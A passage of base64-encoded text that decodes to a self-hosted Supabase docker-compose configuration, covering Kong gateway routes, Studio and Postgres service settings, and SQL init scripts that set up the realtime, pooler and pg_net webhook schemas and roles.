vbDogd3NcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHJlYWx0aW1lLXYxLXdzXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcmVhbHRpbWUvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogZmFsc2VcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cbiAgICAgICAgICAgIC0gYW5vblxuICAtIG5hbWU6IHJlYWx0aW1lLXYxLXJlc3RcbiAgICBfY29tbWVudDogJ1JlYWx0aW1lOiAvcmVhbHRpbWUvdjEvKiAtPiB3czovL3JlYWx0aW1lOjQwMDAvc29ja2V0LyonXG4gICAgdXJsOiBodHRwOi8vcmVhbHRpbWUtZGV2OjQwMDAvYXBpXG4gICAgcHJvdG9jb2w6IGh0dHBcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHJlYWx0aW1lLXYxLXJlc3RcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9yZWFsdGltZS92MS9hcGlcbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiBmYWxzZVxuICAgICAgLSBuYW1lOiBhY2xcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfZ3JvdXBzX2hlYWRlcjogdHJ1ZVxuICAgICAgICAgIGFsbG93OlxuICAgICAgICAgICAgLSBhZG1pblxuICAgICAgICAgICAgLSBhbm9uXG5cbiAgIyMgU3RvcmFnZSByb3V0ZXM6IHRoZSBzdG9yYWdlIHNlcnZlciBtYW5hZ2VzIGl0cyBvd24gYXV0aFxuICAtIG5hbWU6IHN0b3JhZ2UtdjFcbiAgICBfY29tbWVudDogJ1N0b3JhZ2U6IC9zdG9yYWdlL3YxLyogLT4gaHR0cDovL3N1cGFiYXNlLXN0b3JhZ2U6NTAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLXN0b3JhZ2U6NTAwMC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IHN0b3JhZ2UtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvc3RvcmFnZS92MS9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG5cbiAgIyMgRWRnZSBGdW5jdGlvbnMgcm91dGVzXG4gIC0gbmFtZTogZnVuY3Rpb25zLXYxXG4gICAgX2NvbW1lbnQ6ICdFZGdlIEZ1bmN0aW9uczogL2Z1bmN0aW9ucy92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1lZGdlLWZ1bmN0aW9uczo5MDAwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtZWRnZS1mdW5jdGlvbnM6OTAwMC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGZ1bmN0aW9ucy12MS1hbGxcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9mdW5jdGlvbnMvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuXG4gICMjIEFuYWx5dGljcyByb3V0ZXNcbiAgLSBuYW1lOiBhbmFseXRpY3MtdjFcbiAgICBfY29tbWVudDogJ0FuYWx5dGljczogL2FuYWx5dGljcy92MS8qIC0+IGh0dHA6Ly9sb2dmbGFyZTo0MDAwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBhbmFseXRpY3MtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvYW5hbHl0aWNzL3YxL1xuXG4gICMjIFNlY3VyZSBEYXRhYmFzZSByb3V0ZXNcbiAgLSBuYW1lOiBtZXRhXG4gICAgX2NvbW1lbnQ6ICdwZy1tZXRhOiAvcGcvKiAtPiBodHRwOi8vc3VwYWJhc2UtbWV0YTo4MDgwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtbWV0YTo4MDgwL1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogbWV0YS1hbGxcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9wZy9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogZmFsc2VcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cblxuICAjIyBQcm90ZWN0ZWQgRGFzaGJvYXJkIC0gY2F0Y2ggYWxsIHJlbWFpbmluZyByb3V0ZXNcbiAgLSBuYW1lOiBkYXNoYm9hcmRcbiAgICBfY29tbWVudDogJ1N0dWRpbzogLyogLT4gaHR0cDovL3N0dWRpbzozMDAwLyonXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2Utc3R1ZGlvOjMwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBkYXNoYm9hcmQtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBiYXNpYy1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiB0cnVlXG4iCiAgc3VwYWJhc2Utc3R1ZGlvOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9zdHVkaW86MjAyNS4wNi4wMi1zaGEtOGYyOTkzZCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBub2RlCiAgICAgICAgLSAnLWUnCiAgICAgICAgLSAiZmV0Y2goJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvcGxhdGZvcm0vcHJvZmlsZScpLnRoZW4oKHIpID0+IHtpZiAoci5zdGF0dXMgIT09IDIwMCkgdGhyb3cgbmV3IEVycm9yKHIuc3RhdHVzKX0pIgogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZGVwZW5kc19vbjoKICAgICAgc3VwYWJhc2UtYW5hbHl0aWNzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBIT1NUTkFNRT0wLjAuMC4wCiAgICAgIC0gJ1NUVURJT19QR19NRVRBX1VSTD1odHRwOi8vc3VwYWJhc2UtbWV0YTo4MDgwJwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdERUZBVUxUX09SR0FOSVpBVElPTl9OQU1FPSR7U1RVRElPX0RFRkFVTFRfT1JHQU5JWkFUSU9OOi1EZWZhdWx0IE9yZ2FuaXphdGlvbn0nCiAgICAgIC0gJ0RFRkFVTFRfUFJPSkVDVF9OQU1FPSR7U1RVRElPX0RFRkFVTFRfUFJPSkVDVDotRGVmYXVsdCBQcm9qZWN0fScKICAgICAgLSAnU1VQQUJBU0VfVVJMPWh0dHA6Ly9zdXBhYmFzZS1rb25nOjgwMDAnCiAgICAgIC0gJ1NVUEFCQVNFX1BVQkxJQ19VUkw9JHtTRVJWSUNFX1VSTF9TVVBBQkFTRUtPTkd9JwogICAgICAtICdTVVBBQkFTRV9BTk9OX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VBTk9OX0tFWX0nCiAgICAgIC0gJ1NVUEFCQVNFX1NFUlZJQ0VfS0VZPSR7U0VSVklDRV9TVVBBQkFTRVNFUlZJQ0VfS0VZfScKICAgICAgLSAnQVVUSF9KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdMT0dGTEFSRV9BUElfS0VZPSR7U0VSVklDRV9QQVNTV09SRF9MT0dGTEFSRX0nCiAgICAgIC0gJ0xPR0ZMQVJFX1VSTD1odHRwOi8vc3VwYWJhc2UtYW5hbHl0aWNzOjQwMDAnCiAgICAgIC0gJ1NVUEFCQVNFX1BVQkxJQ19BUEk9JHtTRVJWSUNFX1VSTF9TVVBBQkFTRUtPTkd9JwogICAgICAtIE5FWFRfUFVCTElDX0VOQUJMRV9MT0dTPXRydWUKICAgICAgLSBORVhUX0FOQUxZVElDU19CQUNLRU5EX1BST1ZJREVSPXBvc3RncmVzCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogIHN1cGFiYXNlLWRiOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9wb3N0Z3JlczoxNS44LjEuMDQ4JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICdwZ19pc3JlYWR5IC1VIHBvc3RncmVzIC1oIDEyNy4wLjAuMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS12ZWN0b3I6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGNvbW1hbmQ6CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSAnLWMnCiAgICAgIC0gY29uZmlnX2ZpbGU9L2V0Yy9wb3N0Z3Jlc3FsL3Bvc3RncmVzcWwuY29uZgogICAgICAtICctYycKICAgICAgLSBsb2dfbWluX21lc3NhZ2VzPWZhdGFsCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19IT1NUPS92YXIvcnVuL3Bvc3RncmVzcWwKICAgICAgLSAnUEdQT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BPU1RHUkVTX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUEdQQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQR0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdKV1RfRVhQPSR7SldUX0VYUElSWTotMzYwMH0nCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBhYmFzZS1kYi1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9yZWFsdGltZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk5LXJlYWx0aW1lLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXG5jcmVhdGUgc2NoZW1hIGlmIG5vdCBleGlzdHMgX3JlYWx0aW1lO1xuYWx0ZXIgc2NoZW1hIF9yZWFsdGltZSBvd25lciB0byA6cGd1c2VyO1xuIgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2RiL19zdXBhYmFzZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk3LV9zdXBhYmFzZS5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwiJFBPU1RHUkVTX1VTRVJcImBcblxuQ1JFQVRFIERBVEFCQVNFIF9zdXBhYmFzZSBXSVRIIE9XTkVSIDpwZ3VzZXI7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcG9vbGVyLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktcG9vbGVyLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXFxjIF9zdXBhYmFzZVxuY3JlYXRlIHNjaGVtYSBpZiBub3QgZXhpc3RzIF9zdXBhdmlzb3I7XG5hbHRlciBzY2hlbWEgX3N1cGF2aXNvciBvd25lciB0byA6cGd1c2VyO1xuXFxjIHBvc3RncmVzXG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvd2ViaG9va3Muc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk4LXdlYmhvb2tzLnNxbAogICAgICAgIGNvbnRlbnQ6ICJCRUdJTjtcbi0tIENyZWF0ZSBwZ19uZXQgZXh0ZW5zaW9uXG5DUkVBVEUgRVhURU5TSU9OIElGIE5PVCBFWElTVFMgcGdfbmV0IFNDSEVNQSBleHRlbnNpb25zO1xuLS0gQ3JlYXRlIHN1cGFiYXNlX2Z1bmN0aW9ucyBzY2hlbWFcbkNSRUFURSBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIEFVVEhPUklaQVRJT04gc3VwYWJhc2VfYWRtaW47XG5HUkFOVCBVU0FHRSBPTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gVEFCTEVTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gRlVOQ1RJT05TIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gU0VRVUVOQ0VTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMubWlncmF0aW9ucyBkZWZpbml0aW9uXG5DUkVBVEUgVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLm1pZ3JhdGlvbnMgKFxuICB2ZXJzaW9uIHRleHQgUFJJTUFSWSBLRVksXG4gIGluc2VydGVkX2F0IHRpbWVzdGFtcHR6IE5PVCBOVUxMIERFRkFVTFQgTk9XKClcbik7XG4tLSBJbml0aWFsIHN1cGFiYXNlX2Z1bmN0aW9ucyBtaWdyYXRpb25cbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCdpbml0aWFsJyk7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMuaG9va3MgZGVmaW5pdGlvblxuQ1JFQVRFIFRBQkxFIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyAoXG4gIGlkIGJpZ3NlcmlhbCBQUklNQVJZIEtFWSxcbiAgaG9va190YWJsZV9pZCBpbnRlZ2VyIE5PVCBOVUxMLFxuICBob29rX25hbWUgdGV4dCBOT1QgTlVMTCxcbiAgY3JlYXRlZF9hdCB0aW1lc3RhbXB0eiBOT1QgTlVMTCBERUZBVUxUIE5PVygpLFxuICByZXF1ZXN0X2lkIGJpZ2ludFxuKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfcmVxdWVzdF9pZF9pZHggT04gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIFVTSU5HIGJ0cmVlIChyZXF1ZXN0X2lkKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfaF90YWJsZV9pZF9oX25hbWVfaWR4IE9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyBVU0lORyBidHJlZSAoaG9va190YWJsZV9pZCwgaG9va19uYW1lKTtcbkNPTU1FTlQgT04gVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIElTICdTdXBhYmFzZSBGdW5jdGlvbnMgSG9va3M6IEF1ZGl0IHRyYWlsIGZvciB0cmlnZ2VyZWQgaG9va3MuJztcbkNSRUFURSBGVU5DVElPTiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KClcbiAgUkVUVVJOUyB0cmlnZ2VyXG4gIExBTkdVQUdFIHBscGdzcWxcbiAgQVMgJGZ1bmN0aW9uJFxuICBERUNMQVJFXG4gICAgcmVxdWVzdF9pZCBiaWdpbnQ7XG4gICAgcGF5bG9hZCBqc29uYjtcbiAgICB1cmwgdGV4dCA6PSBUR19BUkdWWzBdOjp0ZXh0O1xuICAgIG1ldGhvZCB0ZXh0IDo9IFRHX0FSR1ZbMV06OnRleHQ7XG4gICAgaGVhZGVycyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHBhcmFtcyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHRpbWVvdXRfbXMgaW50ZWdlciBERUZBVUxUIDEwMDA7XG4gIEJFR0lOXG4gICAgSUYgdXJsIElTIE5VTEwgT1IgdXJsID0gJ251bGwnIFRIRU5cbiAgICAgIFJBSVNFIEVYQ0VQVElPTiAndXJsIGFyZ3VtZW50IGlzIG1pc3NpbmcnO1xuICAgIEVORCBJRjtcblxuICAgIElGIG1ldGhvZCBJUyBOVUxMIE9SIG1ldGhvZCA9ICdudWxsJyBUSEVOXG4gICAgICBSQUlTRSBFWENFUFRJT04gJ21ldGhvZCBhcmd1bWVudCBpcyBtaXNzaW5nJztcbiAgICBFTkQgSUY7XG5cbiAgICBJRiBUR19BUkdWWzJdIElTIE5VTEwgT1IgVEdfQVJHVlsyXSA9ICdudWxsJyBUSEVOXG4gICAgICBoZWFkZXJzID0gJ3tcIkNvbnRlbnQtVHlwZVwiOiBcImFwcGxpY2F0aW9uL2pzb25cIn0nOjpqc29uYjtcbiAgICBFTFNFXG4gICAgICBoZWFkZXJzID0gVEdfQVJHVlsyXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVlszXSBJUyBOVUxMIE9SIFRHX0FSR1ZbM10gPSAnbnVsbCcgVEhFTlxuICAgICAgcGFyYW1zID0gJ3t9Jzo6anNvbmI7XG4gICAgRUxTRVxuICAgICAgcGFyYW1zID0gVEdfQVJHVlszXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVls0XSBJUyBOVUxMIE9SIFRHX0FSR1ZbNF0gPSAnbnVsbCcgVEhFTlxuICAgICAgdGltZW91dF9tcyA9IDEwMDA7XG4gICAgRUxTRVxuICAgICAgdGltZW91dF9tcyA9IFRHX0FSR1ZbNF06OmludGVnZXI7XG4gICAgRU5EIElGO1xuXG4gICAgQ0FTRVxuICAgICAgV0hFTiBtZXRob2QgPSAnR0VUJyBUSEVOXG4gICAgICAgIFNFTEVDVCBodHRwX2dldCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9nZXQoXG4gICAgICAgICAgdXJsLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIFdIRU4gbWV0aG9kID0gJ1BPU1QnIFRIRU5cbiAgICAgICAgcGF5bG9hZCA9IGpzb25iX2J1aWxkX29iamVjdChcbiAgICAgICAgICAnb2xkX3JlY29yZCcsIE9MRCxcbiAgICAgICAgICAncmVjb3JkJywgTkVXLFxuICAgICAgICAgICd0eXBlJywgVEdfT1AsXG4gICAgICAgICAgJ3RhYmxlJywgVEdfVEFCTEVfTkFNRSxcbiAgICAgICAgICAnc2NoZW1hJywgVEdfVEFCTEVfU0NIRU1BXG4gICAgICAgICk7XG5cbiAgICAgICAgU0VMRUNUIGh0dHBfcG9zdCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9wb3N0KFxuICAgICAgICAgIHVybCxcbiAgICAgICAgICBwYXlsb2FkLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIEVMU0VcbiAgICAgICAgUkFJU0UgRVhDRVBUSU9OICdtZXRob2QgYXJndW1lbnQgJSBpcyBpbnZhbGlkJywgbWV0aG9kO1xuICAgIEVORCBDQVNFO1xuXG4gICAgSU5TRVJUIElOVE8gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzXG4gICAgICAoaG9va190YWJsZV9pZCwgaG9va19uYW1lLCByZXF1ZXN0X2lkKVxuICAgIFZBTFVFU1xuICAgICAgKFRHX1JFTElELCBUR19OQU1FLCByZXF1ZXN0X2lkKTtcblxuICAgIFJFVFVSTiBORVc7XG4gIEVORFxuJGZ1bmN0aW9uJDtcbi0tIFN1cGFiYXNlIHN1cGVyIGFkbWluXG5ET1xuJCRcbkJFR0lOXG4gIElGIE5PVCBFWElTVFMgKFxuICAgIFNFTEVDVCAxXG4gICAgRlJPTSBwZ19yb2xlc1xuICAgIFdIRVJFIHJvbG5hbWUgPSAnc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluJ1xuICApXG4gIFRIRU5cbiAgICBDUkVBVEUgVVNFUiBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gTk9JTkhFUklUIENSRUFURVJPTEUgTE9HSU4gTk9SRVBMSUNBVElPTjtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIFNDSEVNQSBzdXBhYmFzZV9mdW5jdGlvbnMgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuR1JBTlQgQUxMIFBSSVZJTEVHRVMgT04gQUxMIFRBQkxFUyBJTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIEFMTCBTRVFVRU5DRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5BTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBTRVQgc2VhcmNoX3BhdGggPSBcInN1cGFiYXNlX2Z1bmN0aW9uc1wiO1xuQUxURVIgdGFibGUgXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5taWdyYXRpb25zIE9XTkVSIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkFMVEVSIHRhYmxlIFwic3VwYWJhc2VfZnVuY3Rpb25zXCIuaG9va3MgT1dORVIgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuQUxURVIgZnVuY3Rpb24gXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5odHRwX3JlcXVlc3QoKSBPV05FUiBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5HUkFOVCBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gVE8gcG9zdGdyZXM7XG4tLSBSZW1vdmUgdW51c2VkIHN1cGFiYXNlX3BnX25ldF9hZG1pbiByb2xlXG5ET1xuJCRcbkJFR0lOXG4gIElGIEVYSVNUUyAoXG4gICAgU0VMRUNUIDFcbiAgICBGUk9NIHBnX3JvbGVzXG4gICAgV0hFUkUgcm9sbmFtZSA9ICdzdXBhYmFzZV9wZ19uZXRfYWRtaW4nXG4gIClcbiAgVEhFTlxuICAgIFJFQVNTSUdOIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbiBUTyBzdXBhYmFzZV9hZG1pbjtcbiAgICBEUk9QIE9XTkVEIEJZIHN1cGFiYXNlX3BnX25ldF9hZG1pbjtcbiAgICBEUk9QIFJPTEUgc3VwYWJhc2VfcGdfbmV0X2FkbWluO1xuICBFTkQgSUY7XG5FTkRcbiQkO1xuLS0gcGdfbmV0IGdyYW50cyB3aGVuIGV4dGVuc2lvbiBpcyBhbHJlYWR5IGVuYWJsZWRcbkRPXG4kJFxuQkVHSU5cbiAgSUYgRVhJU1RTIChcbiAgICBTRUxFQ1QgMVxuICAgIEZST00gcGdfZXh0ZW5zaW9uXG4gICAgV0hFUkUgZXh0bmFtZSA9ICdwZ19uZXQnXG4gIClcbiAgVEhFTlxuICAgIEdSQU5UIFVTQUdFIE9OIFNDSEVNQSBuZXQgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluLCBwb3N0Z3JlcywgYW5vbiwgYXV0aGVudGljYXRlZCwgc2VydmljZV9yb2xlO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBTRUNVUklUWSBERUZJTkVSO1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VDVVJJVFkgREVGSU5FUjtcbiAgICBBTFRFUiBmdW5jdGlvbiBuZXQuaHR0cF9nZXQodXJsIHRleHQsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIEFMVEVSIGZ1bmN0aW9uIG5ldC5odHRwX3Bvc3QodXJsIHRleHQsIGJvZHkganNvbmIsIHBhcmFtcyBqc29uYiwgaGVhZGVycyBqc29uYiwgdGltZW91dF9taWxsaXNlY29uZHMgaW50ZWdlcikgU0VUIHNlYXJjaF9wYXRoID0gbmV0O1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfZ2V0KHVybCB0ZXh0LCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIpIEZST00gUFVCTElDO1xuICAgIFJFVk9LRSBBTEwgT04gRlVOQ1RJT04gbmV0Lmh0dHBfcG9zdCh1cmwgdGV4dCwgYm9keSBqc29uYiwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBGUk9NIFBVQkxJQztcbiAgICBHUkFOVCBFWEVDVVRFIE9OIEZVTkNUSU9OIG5ldC5odHRwX2dldCh1cmwgdGV4dCwgcGFyYW1zIGpzb25iLCBoZWFkZXJzIGpzb25iLCB0aW1lb3V0X21pbGxpc2Vjb25kcyBpbnRlZ2VyKSBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4sIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4gICAgR1JBTlQgRVhFQ1VURSBPTiBGVU5DVElPTiBuZXQuaHR0cF9wb3N0KHVybCB0ZXh0LCBib2R5IGpzb25iLCBwYXJhbXMganNvbmIsIGhlYWRlcnMganNvbmIsIHRpbWVvdXRfbWlsbGlzZWNvbmRzIGludGVnZXIp